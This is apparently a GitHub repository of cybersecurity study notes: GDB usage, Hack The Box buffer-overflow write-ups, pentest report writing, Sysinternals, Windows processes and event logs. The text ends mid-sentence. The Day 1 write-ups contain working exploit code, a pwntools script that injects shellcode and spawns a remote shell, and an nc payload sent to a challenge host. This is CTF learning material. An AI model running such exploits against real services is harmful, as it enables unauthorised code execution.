├── .gitignore ├── Day 1 - Linux Stack Smashing ├── Images │ └── ghidra.png ├── README.md ├── batcomputer.md └── jeeves.md ├── Day 10 - Report Writing └── README.md ├── Day 11 - SysInternals └── README.md ├── Day 12 - Core Windows Processes └── README.md ├── Day 13 - Event Logs └── README.md ├── Day 14 - Yara └── README.md ├── Day 15 - ROP Attacks Basics ├── Images │ ├── functions.png │ ├── overwritten.png │ ├── patternsearch.png │ ├── reg.png │ ├── run.png │ └── winner.png └── README.md ├── Day 16 - OAuth Basics └── README.md ├── Day 17 - Linux Privelege Escalation └── README.md ├── Day 2 - More about Stacks and Linux BOF ├── Images │ ├── ghex.png │ ├── intialize.png │ └── main.png ├── README.md └── optimistic.md ├── Day 20- File Transfers └── README.md ├── Day 21 - Pwntools Usage Basics └── README.md ├── Day 22 - GraphQL Basic Techniques └── README.md ├── Day 23 - Linux Command Line and Bash ├── README.md └── testfiles │ ├── awk.txt │ ├── grep.txt │ ├── newtr.txt │ ├── sort.txt │ ├── tr.txt │ └── uniq.txt ├── Day 24 - Powershell Basics └── README.md ├── Day 25 - x64 Linux Binary Exploitation (1) └── README.md ├── Day 26 - .NET Executing Reversing ├── Images │ ├── flag.png │ ├── importing.png │ ├── main1.png │ ├── main2.png │ └── online.png └── README.md ├── Day 27 - Docker └── README.md ├── Day 28 - Mitre ├── Attack.png └── README.md ├── Day 29 - File Inclusion ├── Pasted image 20211011233528.png ├── Pasted image 20211011233544.png └── README.md ├── Day 3 - Simple Domain Ennumeration in AD └── README.md ├── Day 4 - Lateral Movement and PrivEsc └── README.md ├── Day 5 - XML External Entity Injection └── README.md ├── Day 6 - API Basic Techniques └── README.md ├── Day 7 - Android Hacking Basic Techniques └── README.md ├── Day 8 - Voltatlity Forensics └── README.md ├── Day 9 - Assembly Language Basics └── README.md └── README.md /.gitignore: -------------------------------------------------------------------------------- 1 | ~/.obisidian 2 | -------------------------------------------------------------------------------- /Day 1 - Linux Stack Smashing/Images/ghidra.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nickapic/Cyber-Security-Knowledge/91f78514d5b122e769244bad2235808054b70acf/Day 1 - Linux Stack Smashing/Images/ghidra.png -------------------------------------------------------------------------------- /Day 1 - Linux Stack Smashing/README.md: -------------------------------------------------------------------------------- 1 | ### GDB Introduction 2 | 3 | Resources used : 4 | 5 | INE : www.ine.com : Exploit Development Student Course : https://ine.com/pages/cybersecurity 6 | PinkDraconian on Youtube : https://www.youtube.com/watch?v=W5dVsa3__N4&t 7 | Hackthebox Academy : https://academy.hackthebox.eu/module/31 8 | 9 | GDB is a tool we use to view the created binary on the assembler lever. 10 | 11 | We can load a binary into gdb like this : 12 | 13 | ```bash 14 | gdb -q bow32 15 | ``` 16 | 17 | and then to disassemble the main function we can use the following command : 18 | 19 | ```bash 20 | disassemble main 21 | ``` 22 | 23 | I personally prefer intel syntax to set it like that we can use : 24 | 25 | ```bash 26 | echo 'set disassembly-flavor intel' > ~/.gdbinit 27 | ``` 28 | 29 | Registers are the main parts of CPU, almost all registers offer a small part of storage space where data is temporarily stored. 30 | 31 | Registers will be divided into General registers, Control registers, and Segment registers. The most critical registers we need are the General registers. 32 | 33 | In GDB we also have a lot of plugins to improve the visibility provided to us via the plugin and from my research I have GDB Peda is very popular one so I will be using that one. 34 | There GitHub can be found here : https://github.com/longld/peda 35 | And the installation guide is like so 36 | 37 | ```bash 38 | git clone https://github.com/longld/peda.git ~/peda 39 | echo "source ~/peda/peda.py" >> ~/.gdbinit 40 | ``` 41 | 42 | We can also use GDB in a quiet mode to not print a lot of initial info using ( -q ) and -p can be used to attach it to processes. -h for printing out its help menu and so on. 43 | 44 | 45 | 46 | Some Useful Functions in GDB are : 47 | 48 | 1. disas / disassemble [function name here] : To disassemble a function of a certain name. 49 | 2. break [ by function name ] / break *0xAddress - To put breakpoints in our code at the entry of function or a certain address. 50 | 3. print [name/register/variable] : This can be used to print out the value of a function, register or var. 51 | 4. info [name] : This will display information about a certain thing you tell it, Like info registers will print all registers. 52 | 5. step : Step to the next source line in the code. 53 | 6. stepi : Step into exactly one instruction 54 | 7. x - examine : This can be used to display various memory locations in various formats. 55 | 56 | ```bash 57 | x/[number of units][data type][location name] 58 | ``` 59 | 8. To display n number of words after a instruction we can use 60 | 61 | ```bash 62 | # In case n is 10 63 | x/10w $eip 64 | ``` 65 | 66 | 9. To display n number of instructions starting from a certain register, instruction. 67 | ```bash 68 | # in case of n= 20 69 | x/20i $eip 70 | ``` 71 | To do a basic Binary Exploitation check with gdbpeda we can use the following syntax : 72 | ```bash 73 | gdb 74 | r # To run the binary 75 | # Lets get some payloads with gdb-peda we can use pattern create 76 | pattern_create 150 # We can now run he program with this output we got and the RSP,ESP first 4 letters are what we will we have to analyze 77 | pattern_offset # and we will get the offset 78 | ``` 79 | 80 | Other Useful tools : readelf, ltrace, strace, strings and objdump. 81 | 82 | 1. ltrace and strace are used to trace library and system calls respectfully performed by the binary. 83 | 2. readelf displays information about the executable file itself. 84 | 3. objdump displays information about object files , it can also disassemble Linux executables. 85 | 4. strings this is to just extract all the readable strings from a binary , this is useful if something is lets say hardcoded in a binary. 86 | 87 | 88 | Also a great way we should try to analyze stuff is by using Ghidra to analyze the binary, you can also use r2 but Ghidra analyses the code and puts it in C which makes it easier to understand it. 89 | A great resource to learn this is : https://tryhackme.com/room/ccghidra and we can also use Pwntools library to basically help us with the exploitation of this process. 90 | -------------------------------------------------------------------------------- /Day 1 - Linux Stack Smashing/batcomputer.md: -------------------------------------------------------------------------------- 1 | ### Batcomputer 2 | 3 | Main Resource used : https://www.youtube.com/watch?v=3Snd6A_duSQ : Pink Draconian on Youtube 4 | 5 | GDB output : 6 | ```bash 7 | gdb-peda$ r 8 | Starting program: /home/nickapic/htb/challenges/batcomputer/batcomputer 9 | Welcome to your BatComputer, Batman. What would you like to do? 10 | 1. Track Joker 11 | 2. Chase Joker 12 | > 2 13 | Ok. Let's do this. Enter the password: b4tp@$$w0rd! 14 | Access Granted. 15 | Enter the navigation commands: aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabj 16 | Roger that! 17 | Welcome to your BatComputer, Batman. What would you like to do? 18 | 1. Track Joker 19 | 2. Chase Joker 20 | > 3 21 | Too bad, now who's gonna save Gotham? Alfred? 22 | 23 | Program received signal SIGSEGV, Segmentation fault. 24 | [----------------------------------registers-----------------------------------] 25 | RAX: 0x0 26 | RBX: 0x0 27 | RCX: 0x7ffff7ed2f33 (<__GI___libc_write+19>: cmp rax,0xfffffffffffff000) 28 | RDX: 0x0 29 | RSI: 0x7ffff7fa3723 --> 0xfa5670000000000a 30 | RDI: 0x7ffff7fa5670 --> 0x0 31 | RBP: 0x6161617561616174 ('taaauaaa') 32 | RSP: 0x7fffffffd938 ("vaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabj^%U\260PUUUU") 33 | RIP: 0x55555555531f (ret) 34 | R8 : 0x2e ('.') 35 | R9 : 0x0 36 | R10: 0x7ffff7f55ac0 --> 0x100000000 37 | R11: 0x246 38 | R12: 0x5555555550b0 (endbr64) 39 | R13: 0x0 40 | R14: 0x0 41 | R15: 0x0 42 | EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) 43 | 44 | ``` 45 | 46 | Here the RIP would be overwritten by the first 4 characters shown to us in the RSP which in our case is "vaaa" 47 | 48 | This is command prompt i used to create the cyclic variables and check what is the offset 49 | 50 | ```python 51 | >>> import pwn 52 | >>> pwn.cyclic(137) 53 | b'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabj' 54 | >>> pwn.cyclic_find('vaaa') 55 | 84 56 | ``` 57 | 58 | Solution : 59 | ```python 60 | from pwn import * 61 | 62 | def main(): 63 | context(os='linux', arch='amd64') 64 | io = remote('remote ip', remote port) # Connecting to a Remote IP and Port 65 | # First Step is to ennumerate 66 | password = 'b4tp@$$w0rd!' # Password we got from Ghidra 67 | return_address = 84 # GDB gave us the offset / the amount of bytes to overwrite the EIP 68 | 69 | # get stack address 70 | 71 | io.sendlineafter('> ', '1') # As the prompt starts like "> " and asks for our input 72 | stack_address = io.recvline().strip().split()[-1] # Get the last item of the output here which is ----------------- address 73 | stack_address = ''.join([chr(int(stack_address[i:i+2], 16)) for i in range(2, len(stack_address), 2)]) # To make the address we get from this into bytes 0x12345678 to /x12/x34/x56/x78 etc. 74 | # To make sure the address is 8 bytes 75 | stack_address = stack_address.rjust(8, '\x00') 76 | stack_address = u64(stack_address, endian='big') # To make it easier to work with it with addition to the address and so on and we set it to little endian as we have LSB so Least Significant Bits first so big endian 77 | log.success(f'Gottem: {p64(stack_address)}' ) # Just logging to see if all is alright 78 | 79 | # Step 2 : Do Buffer Overflow 80 | io.sendlineafter('> ', '2') 81 | io.sendlineafter('password: ', password) 82 | shellcode = asm(shellcraft.popad() + shellcraft.sh()) 83 | padding = b'a'* (return_address - len(shellcode)) 84 | payload = shellcode + padding + p64(stack_address) 85 | io.sendlineafter('commands: ', payload) 86 | # To Triger the fault we need to return so doing 3 we get the seg fault error 87 | io.sendlineafter('> ', '3') 88 | io.interactive() 89 | 90 | main() 91 | ``` 92 | 93 | 94 | -------------------------------------------------------------------------------- /Day 1 - Linux Stack Smashing/jeeves.md: -------------------------------------------------------------------------------- 1 | ### Jeeves Hack the Box Challenge : Intro to Binary Exploitation 2 | 3 | Main Resource Used : https://www.youtube.com/watch?v=W5dVsa3__N4&t 4 | 5 | Lets try to check what the binary is doing and it seems to be a very simple binary just out putting the following output and in the middle it asks for our name and then displays it with a greeting like so : 6 | 7 | ```bash 8 | Hello, good sir! 9 | May I have your name? a 10 | Hello a, hope you have a good day! 11 | ``` 12 | 13 | Now lets analyze the file in Ghidra to see what its actually doing. 14 | 15 | ![Ghidra Screenshot](ghidra.png) 16 | 17 | Here it seems we need to overwrite the value of the variable i have renamed as variable to overwrite and this machine is using the gets function which is vulnerable to buffer overflow so we can try to overwrite the value to that certain point using the buffer overflow attack but to do lets first lets see if we can overwrite stuff. So transferring my application to gdb and running it with a 100 characters i get a segmentation fault and i can see that i can overwrite the variable : 18 | 19 | ```bash 20 | gdb-peda$ r 21 | Starting program: /home/nickapic/htb/challenges/jeeves 22 | Hello, good sir! 23 | May I have your name? aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 24 | Hello aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, hope you have a good day! 25 | 26 | Program received signal SIGSEGV, Segmentation fault. 27 | [----------------------------------registers-----------------------------------] 28 | RAX: 0x0 29 | RBX: 0x0 30 | RCX: 0x0 31 | RDX: 0x0 32 | RSI: 0x5555555592a0 ("Hello ", 'a' , ", hope you have a good day!\n") 33 | RDI: 0x7ffff7fa5670 --> 0x0 34 | RBP: 0x6161616161616161 ('aaaaaaaa') 35 | RSP: 0x7fffffffded8 ('a' ) 36 | RIP: 0x5555555552ae (: ret) 37 | R8 : 0xffffffff 38 | R9 : 0x86 39 | R10: 0x7fffffffde90 ('a' ) 40 | R11: 0x246 41 | R12: 0x555555555100 (<_start>: endbr64) 42 | R13: 0x0 43 | R14: 0x0 44 | R15: 0x0 45 | EFLAGS: 0x10212 (carry parity ADJUST zero sign trap INTERRUPT direction overflow) 46 | ``` 47 | 48 | Now lets try to calculate how many values we gotta go over to get the our variable to overwrite. 49 | 50 | We see there is 44 size buffer then an integer which is 4 bytes , then a pointer which is normally 8 bytes and then the int variable which we have to overwrite is 4 bytes so we will need to also add another 4 bytes this calculation to ```0x1337bab3``` 51 | So 44+4+8+4 = 56 bytes of padding and then the address. So we can also see that this is in little endian and for 64bit. So we can use soemthing like the pwn library to pack our 64 bit integer 52 | 53 | Information about this : https://docs.pwntools.com/en/stable/util/packing.html?highlight=p64#pwnlib.util.packing.p64 54 | 55 | 56 | ```bash 57 | python2 -c "import pwn; print('a'*60 + pwn.p64(0x1337bab3))" > input.txt 58 | ``` 59 | 60 | and then to get the flag we can use : 61 | 62 | ```bash 63 | nc 139.59.162.195 30942 < input 64 | ``` 65 | -------------------------------------------------------------------------------- /Day 10 - Report Writing/README.md: -------------------------------------------------------------------------------- 1 | 2 | ### Report Writting 3 | For Report Writing first of all we gotta choose a template i chose the template from this repository here : 4 | 5 | [](https://github.com/noraj/OSCP-Exam-Report-Template-Markdown)[https://github.com/noraj/OSCP-Exam-Report-Template-Markdown](https://github.com/noraj/OSCP-Exam-Report-Template-Markdown) 6 | 7 | and this will help us write Report in Markdown and to set this up i highly recommend watching the Video from John Hammond who explains the note taking and using this template in a very nice way: 8 | 9 | [](https://www.youtube.com/watch?v=MQGozZzHUwQ&t=411s)[https://www.youtube.com/watch?v=MQGozZzHUwQ&t=411s](https://www.youtube.com/watch?v=MQGozZzHUwQ&t=411s) 10 | 11 | And now lets look at the composition of a Report : 12 | 13 | 1. Introduction 14 | 2. Executive Summary 15 | 3. Reporting Summary (Technical) 16 | 4. Remediation Summary 17 | 18 | ### Introduction 19 | 20 | For the Introduction Part you can use examples from a few templates and edit them This Section Basically covers information and summary of what task you are given, the Confidentiality Statement so stuff like who has access to this, A disclaimer, and then an Assessment Overview where we basically define the date from which we will be doing the assessment, the activities in a very General Form like Planning, Discovery, Attack, Reporting. 21 | 22 | Next in this section, we define the criteria we will be evaluating the system by for example if you are giving a Risk Value for each Vulnerability you can write how you would evaluate that like what is Low Risk, What is a medium risk, and so on and how are you classifying so like are you using a generic low → Medium → High scale or something else you can also use a standard like CVE-Scores to define your Risk Values and state them here. 23 | 24 | For getting an example on this i would highly recommend checking out this repository from The Cyber Mentor who has a sample report again that report will also give you a very good idea of what a report should consist of. 25 | 26 | Then a small summary of the scope we were allocated and our task should also be included in a section called scope. 27 | 28 | Resources : 29 | 30 | Template → [](https://github.com/hmaverickadams/TCM-Security-Sample-Pentest-Report)[https://github.com/hmaverickadams/TCM-Security-Sample-Pentest-Report](https://github.com/hmaverickadams/TCM-Security-Sample-Pentest-Report) 31 | 32 | ### Executive Summary 33 | 34 | This part is what consists of us basically summarizing the whole Assessment for the higher ups they don't really care about the specifics of the exploits but they want to know for example lets say how is the overall security looking like, what would be the cost to fix everything up and the number of vulnerabilities (We will have graphs and stuff for that) and now lets try to break this down in sections : 35 | 36 | 1. Introduction and Summary of the Report : This is a short summary basically summarizing stuff like since when and what time Time Period the assessment was carried and if we were able to compromise the machines and if we have completed the targets that were set in the Rules of Engagement. 37 | 2. Attack Summary : Here we have the basic summary of the attack and how we managed to compromise the Machines but more on a basic /simple level as we don't wanna have too put too many details for the executives we do a more detailed and through report in the Vulnerability assessment. 38 | 3. Vulnerabilites Found Graph : Here we provide the employers with a graph that can summarize the vulnerabilites in each category like the diagrams like this : 39 | 40 | ![https://s3-us-west-2.amazonaws.com/secure.notion-static.com/15c8c253-0f46-4321-82b0-0a64813927a9/Untitled.png](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/15c8c253-0f46-4321-82b0-0a64813927a9/Untitled.png) 41 | 42 | Resources that can be used to make graphs : 43 | 44 | [](https://www.rapidtables.com/tools/bar-graph.html)[https://www.rapidtables.com/tools/bar-graph.html](https://www.rapidtables.com/tools/bar-graph.html) 45 | 46 | [](https://spark.adobe.com/make/charts/bar-graph/)[https://spark.adobe.com/make/charts/bar-graph/](https://spark.adobe.com/make/charts/bar-graph/) 47 | 48 | [](https://www.visme.co/graph-maker/)[https://www.visme.co/graph-maker/](https://www.visme.co/graph-maker/) 49 | 50 | 4. Security Strengths and Weaknesses : Then in these two sections we basically summarize the Security Strengths of the Organization like if they caught one of your attack, or maybe there is a firewall in place which made the process hard you can compliment annd metnion them here and then in the weaknesses it could be that no one in the company found out there was an attack being carried out , nno two factor authentication in place , etc. 51 | 52 | You can also use a diffrent approach and grade your clients Security out of a scale like maybe out of 1-10 or a scale you define. 53 | 54 | ### Vulnerability Report : 55 | 56 | This is the report we go into more technical details about all the vulnerabilities we gathered and this sections we try to divide by hosts/network sections of the organisation as well like for example and first we can organise and write all the vulnerabilities about machines divided into their own sections. So lets say for example we can have it like so : 57 | 58 | In our example case lets assume we have two network sections( CORP, ACME.LOCAL) and in those we have two machines ( Machine 1 and Machine2 ) then we can classify it like so : 59 | 60 | **CORP Network** 61 | 62 | General Idea about how you got into the network 63 | 64 | Machine 1 : 65 | 66 | Vulnerabilities in this system . 67 | 68 | **ACME.LOCAL** 69 | 70 | Machine 2 : 71 | 72 | Vulnerabilities in this system. 73 | 74 | Now let's see how we can describe these vulnerabilities and provide specifications about them for example lets choose : 75 | 76 | Input Validation Error in the login form which causes SQLi 77 | 78 | Now to Describe this would be great if you can provide as much technical information about this vulnerability as possible and where its caused and if you have access to the source code you can point out the the errors directly in the source code. 79 | 80 | For our Example : 81 | 82 | --- 83 | 84 | **SQLi attack due to poor input validation in login form →** 85 | 86 | This error happens due to no sanitisation done on the server side and even client side which leads the login form being a place where malicious actors can place malicious payloads and dump the organisation's database and get sensitive information. 87 | 88 | Risk : Possible Risk of Sensitive Data Disclosure due to SQL Injection attack which can lead to GDPR fines causing a huge financial impact on the organisation. 89 | 90 | Impact Level : Very High 91 | 92 | Likelihood : Very Likely 93 | 94 | Vulnerable Piece of Code : 95 | 96 | /\*Here you can show the Vulnerable code if you have access to the source code \*/ 97 | 98 | --- 99 | 100 | ### Remediation Summary : 101 | 102 | This is a place where you can give an overall summary of the actions needed to fix for the system at first like if there is a weak password policy in place, no anit viruses in place etc they can be addressed at first, and then we can go into more about fixes about each and every vulnerability in the system i personally go over them in the same order i defined the sections in the Vulnerability Section for this , if you have compromised something using a Metasploit module you can look up patches on that exploit, module or you can search the name of the vulnerability and look for patches from the vendor. 103 | 104 | If the vulnerability is more about Web exploitation you can use OWASP Guides to make suggestions for the organization and tell them to treat this as a guide for development to avoid mistakes in development, also if its stuff that is popular like shellshock you can look up patches and so on and in some cases you can try providing improved code snippets of the vulnerable piece of code in the system and the same can be done for Buffer Overflows and fixing the vulnerable/defected part of the web app or app in general. 105 | 106 | You can also provide soluitions / applications that help such issues like in case of a node js application you can recommend some packages to help fix issues in the webapp. 107 | 108 | In this stage you can also provide an estimated budget the company would need to fix these issues. -------------------------------------------------------------------------------- /Day 11 - SysInternals/README.md: -------------------------------------------------------------------------------- 1 | ### Microsoft Sysinternals 2 | 3 | Main resources used : https://tryhackme.com/room/btsysinternalssg 4 | 5 | Sysinternals are basically a set of tools that are windows based and help us with the following utilities : 6 | 7 | 1. File and Disk Utilies 8 | 2. Networking Utilities 9 | 3. Process Utilities 10 | 4. Security Utilities 11 | 5. System Utilities 12 | 6. Miscellaneous 13 | 14 | These tools are used a lot by System admins and also Red Teamers to blend in quitely and do malicious activities. 15 | 16 | To download Sysinternals we can use : 17 | 18 | https://docs.microsoft.com/en-us/sysinternals/downloads/ : To download only a few specific tools so to say. 19 | If you wanna get the whole suite use this : https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite 20 | 21 | We can also use Sysinternals Live which is a alternative to downloading all the tools and just using their online version. 22 | 23 | ``` 24 | \\live.sysinternals.com\tools\procmon.exe 25 | ``` 26 | 27 | **For this make sure you have the service webclient/webdav running also Also, Network Discovery needs to be enabled as well. This setting can be enabled in the Network and Sharing Center.** 28 | 29 | 30 | ##### File and Disk Utilities 31 | 32 | Sigchek : Shows File version number, timestamp information, digital signature detials . It can also check files status on virus total. 33 | 34 | Syntax : 35 | ``` 36 | sigcheck -u -e C:\Windows\System32 37 | # -u means if virus total is enabled show files that are unkown by Virustotal or have a non-zero detection. 38 | # -e scan executable images only 39 | ``` 40 | 41 | Streams : This tool helps us find alternate data streams in files and allow reading and writting in those streams which can be created due to NTFS file systems. 42 | Alternate Data Streams (ADS) is a file attribute specific to Windows NTFS (New Technology File System). Every file has at least one data stream ($DATA) and ADS allows files to contain more than one stream of data. 43 | This is often used in Malwares to hide data, but its not all malicious. 44 | 45 | ``` 46 | streams filepath # to reveal streams 47 | notepad filepath:streamname # to open notepad with the stream data 48 | ``` 49 | 50 | SDelete : This allows us to delete one or more files and/or directories to free space on a logic disk. 51 | 52 | It implented the DOD 5220.22-M (Department of Defense clearing and sanitizing protocol). 53 | 54 | Other good File and Disk Utilities : https://docs.microsoft.com/en-us/sysinternals/downloads/file-and-disk-utilities 55 | 56 | ##### Networking Utilities 57 | 58 | TCPview : This shows us all TCP and UDP endpoints on our system, including the local and remote addresses and state of TCP connections. It provides a more informative and conveniently presented subset of the Netstat program that ships with Windows also a cmd line version for it is TCPvcon. 59 | 60 | ##### Process Utilities 61 | 62 | Autoruns : This has comprensive knowledge of auto-starting locations of any startup monitor and shows what tuff starts up when you bootup stuff , its a very powerfull tool to search for any malicious entries created in the local machine for persistence. 63 | ``` 64 | autoruns 65 | ``` 66 | 67 | Procdump : This for monitorinng an application for CPU spikes and generating crash dumps during a spike to determine the cause of spike. You can create dumps by right click on processes.* 68 | 69 | Process Monitor : Advanced monitoring tool that shows real-time file system , registery, process/thread activity. Its very powerfull and can be very usefull for system troubleshooting and malware hunting. 70 | 71 | ``` 72 | procmon 73 | ``` 74 | 75 | it captures events that happen in the OS though you can turn it on and off in the File tab and there are a lot lot of them so to use it efficiently you gotta use filters which is fairly easy. 76 | A good reosurce for it : https://adamtheautomator.com/procmon/ 77 | 78 | PSexec : This is a replacement for telnet , which lets you execute processes on other systems, like a cmd shell would basically. This utilised a lot in red teaming assesments as well. 79 | 80 | ##### Security Utilities. 81 | 82 | Sysmon : This is a windows system service and device driver that remains across system reboots to monitor and log system activity to windows event log. 83 | 84 | ##### System Information 85 | 86 | WinObj : This tools uses the native windows api to access and display information on NT object manager's name space. 87 | 88 | Session 0 is OS Session , Session 1 is User Session 89 | ``` 90 | winobj 91 | ``` 92 | 93 | ##### Miscellaneous 94 | 95 | Bginfo : Weird tool that allows you to display relevant information about a windows computer on desktop background. 96 | 97 | RegJump : command-line applet takes a registry path and makes Regedit open to that path. -------------------------------------------------------------------------------- /Day 12 - Core Windows Processes/README.md: -------------------------------------------------------------------------------- 1 | ### Core Windows Processes 2 | 3 | Resources Used : https://tryhackme.com/room/btwindowsinternals 4 | 5 | Learning about this helps us understand the normal behaviour within a windows OS and detect if any issues /malicious activity happen. 6 | 7 | Task Manager : This is a main tool GUI based that shows whats running on the Windows System, resource usages and also can be used to kill processes. 8 | 9 | You can right click on the places where it says Name, Staus, CPU usage and so on to to show more fields and tabs 10 | 11 | - **Type** \- Each process falls into 1 of 3 categories (Apps, Background process, or Windows process). 12 | - **Publisher** \- Think of this column as the name of the author of the program/file. 13 | - **PID** \- This is known as the process identifier number. Windows assigns a unique process identifier each time a program starts. If the same program has multiple processes running, each will have its own unique process identifier (PID). 14 | - **Process name** \- This is the file name of the process. In the above image, the file name for Task Manager is Taskmrg.exe. 15 | - **Command line** \- The full command used to launch the process. 16 | - **CPU** \- The amount of CPU (processing power) used by the process. 17 | - **Memory** \- The amount of physical working memory utilized by the process. 18 | 19 | Then you can also go tot he Details tab which has a lot more details about the processes , a good way to know in Details tab if something is of is off is checking the Image Path name and Command Line used for it. 20 | 21 | Parent-Child Process view is not a feature in Task Manager , but we can use tools like Process Hacker and Process Exploirer for that. cmd line equivalent : 22 | ``` 23 | tasklist 24 | Get-Process 25 | ps 26 | wmic 27 | ``` 28 | 29 | ##### System 30 | 31 | This is of the PID 4, this is the home of thread that runs only in kernel mode a kernel-mode system thread.System threads have all the attributes and contexts of regular user-mode threads (such as a hardware context, priority, and so on) but are different in that they run only in kernel-mode executing code loaded in system space, whether that is in Ntoskrnl.exe or in any other loaded device driver. This is run by the Image Path : ```C:\\Windows\\system32\\ntoskrnl.exe (NT OS Kernel)``` 32 | 33 | 34 | ###### smss.exe 35 | 36 | This process is known for Windows Session Manager which is responsible for creating new sessions, This is the 1st user-mode process by the kernel.Smss.exe starts csrss.exe (Windows subsystem) and wininit.exe in Session 0, an isolated Windows session for the operating system, and csrss.exe and winlogon.exe for Session 1, which is the user session. SMSS is also responsible for creating environment variables, virtual memory paging files and starts winlogon.exe 37 | 38 | Normal Configurations are like this : 39 | 40 | **Image Path**:  %SystemRoot%\\System32\\smss.exe 41 | 42 | **Parent Process**:  System 43 | 44 | **Number of Instances**:  One master instance and child instance per session. The child instance exits after creating the session. 45 | 46 | **User Account**:  Local System 47 | 48 | **Start Time**:  Within seconds of boot time for the master instance 49 | 50 | ###### csrss.exe 51 | 52 | This is Client Server runitime process in the user-mode side. This is always running and critical to OS. Responsible for win32 console window and process thread creation and deletion. For each time csrsrv.dll, basesrv.dll, and winsrv.dll are loaded 53 | 54 | Normal Configurations : 55 | **Image Path**:  %SystemRoot%\\System32\\csrss.exe 56 | 57 | **Parent Process**:  Created by an instance of smss.exe 58 | 59 | **Number of Instances**:  Two or more 60 | 61 | **User Account**:  Local System 62 | 63 | **Start Time**:  Within seconds of boot time for the first 2 instances (for Session 0 and 1).  Start times for additional instances occur as new sessions are created, although often only Sessions 0 and 1 are created. 64 | 65 | ###### Wininit.exe 66 | 67 | This is responsibel for launching services.exe , lsass.exe and lsaiso.exe within session 0. Vewry crtical process. lsaiso.exe is a process associated with Credential Guard and Key Guard. You will only see this process if Credential Guard is enabled. 68 | 69 | **Image Path**:  %SystemRoot%\\System32\\wininit.exe 70 | **Parent Process**:  Created by an instance of smss.exe 71 | **Number of Instances**:  One 72 | **User Account**:  Local System 73 | **Start Time**:  Within seconds of boot time 74 | 75 | ###### Services.exe 76 | This is Service Control Manager (SCM) and its responsible to handle system services, loading services, startin/ending service also manages db for sc.exe. 77 | Information about services is stored in HKLM\\System\\CurrentControlSet\\Services 78 | 79 | Parent Process to vchost.exe, spoolsv.exe, msmpeng.exe, dllhost.exe, to name a few 80 | 81 | Normal COnfiguration : 82 | **Image Path**:  %SystemRoot%\\System32\\services.exe 83 | **Parent Process**:  wininit.exe 84 | **Number of Instances**:  One 85 | **User Account**:  Local System 86 | **Start Time**:  Within seconds of boot time 87 | 88 | 89 | ###### lsass.exe 90 | 91 | This is a process that is responsible for enforcing the security policy on the system.Handles password changes, verifies logins, creates access tokens. It creates security tokens for SAM (Security Account Manager), AD (Active Directory), and NETLOGON. 92 | 93 | https://yungchou.wordpress.com/2016/03/14/an-introduction-of-windows-10-credential-guard/ 94 | 95 | Normal Configuration : 96 | **Image Path**:  %SystemRoot%\\System32\\lsass.exe 97 | **Parent Process**:  wininit.exe 98 | **Number of Instances**:  One 99 | **User Account**:  Local System 100 | **Start Time**:  Within seconds of boot time 101 | 102 | ###### winlogon.exe 103 | 104 | This is responsible for Secure Attention Sequence (SAS) , This is the alt+ctrl+delete key combination users press to enter username and passwords. Responsible for loading the user profile. Also responsible for locking the screen and running the user's screensaver, among other functions. 105 | 106 | Normal Configuration : 107 | **Image Path**:  %SystemRoot%\\System32\\winlogon.exe 108 | **Parent Process**:  Created by an instance of smss.exe that exits, so analysis tools usually do not provide the parent process name. 109 | **Number of Instances**:  One or more 110 | **User Account**:  Local System 111 | **Start Time**:  Within seconds of boot time for the first instance (for Session 1).  Additional instances occur as new sessions are created, typically through Remote Desktop or Fast User Switching logons. 112 | 113 | ###### Explorer.exe 114 | 115 | This is the process that gives us acccess to our folders and files, Also functionality to other features as start menu, taskbar,etc. 116 | 117 | Normal Configuration : 118 | **Image Path**:  %SystemRoot%\\explorer.exe 119 | **Parent Process**:  Created by userinit.exe and exits 120 | **Number of Instances**:  One or more per interactively logged-in user 121 | **User Account**:  Logged-in user(s) 122 | **Start Time**:  First instance when the first interactive user logon session begins 123 | 124 | 125 | ###### svchost.exe 126 | 127 | This is responsible for hosting and managing windows services. Services running in this process are implemented as DLLs. The DLL to implement is stored in the registry for the service under the `Parameters` subkey in `ServiceDLL`. The full path is `HKLM\SYSTEM\CurrentControlSet\Services\SERVICE NAME\Parameters` . PID 748 128 | 129 | Normal Configuration : 130 | **Image Path**: %SystemRoot%\\System32\\svchost.exe 131 | **Parent Process**: services.exe 132 | **Number of Instances**: Many 133 | **User Account**: Varies (SYSTEM, Network Service, Local Service) depending on the svchost.exe instance. In Windows 10 some instances can run as the logged-in user. 134 | **Start Time**: Typically within seconds of boot time. Other instances can be started after boot -------------------------------------------------------------------------------- /Day 13 - Event Logs/README.md: -------------------------------------------------------------------------------- 1 | ### Windows Event Logs 2 | 3 | Main Resource used : https://tryhackme.com/room/windowseventlogs 4 | 5 | Event Logs record events that happen in the execution of a system to provide an audit trail and to understand the activity of the system and to also find problems. 6 | 7 | OS by default also write error messages to these logs. This can be very useful for Blue teamers to find correlations between logs from Multiple sources, leading to statistical analysis and find out events which wouldnt have been found otherwise. 8 | 9 | To help with this we can SIEM tools like : Splunk, Elastic. 10 | Event though we can access remote machine's logs its not feasable, So thats where SIEM systems come in and help us look at logs from all the endpoints, appliances, etc and they allow us to query logs from multiple devices instead of manually viewing each one. 11 | 12 | 13 | The Log files are not text files and viewable in text editor but we convert them to XML with Windows API. Common Exentsion : .evt, .evtx 14 | Common Locations : `C:\\Windows\\System32\\winevt\\Log` 15 | 16 | 3 main tools : 17 | 1. **Event Viewer** (GUI-based application) 18 | 2. **Wevtutil.exe** (command-line tool) 19 | 3. **Get-WinEvent** (PowerShell cmdlet) 20 | 21 | Each with their pros and cons 22 | 23 | ##### Event Viewer 24 | To open this tool right click 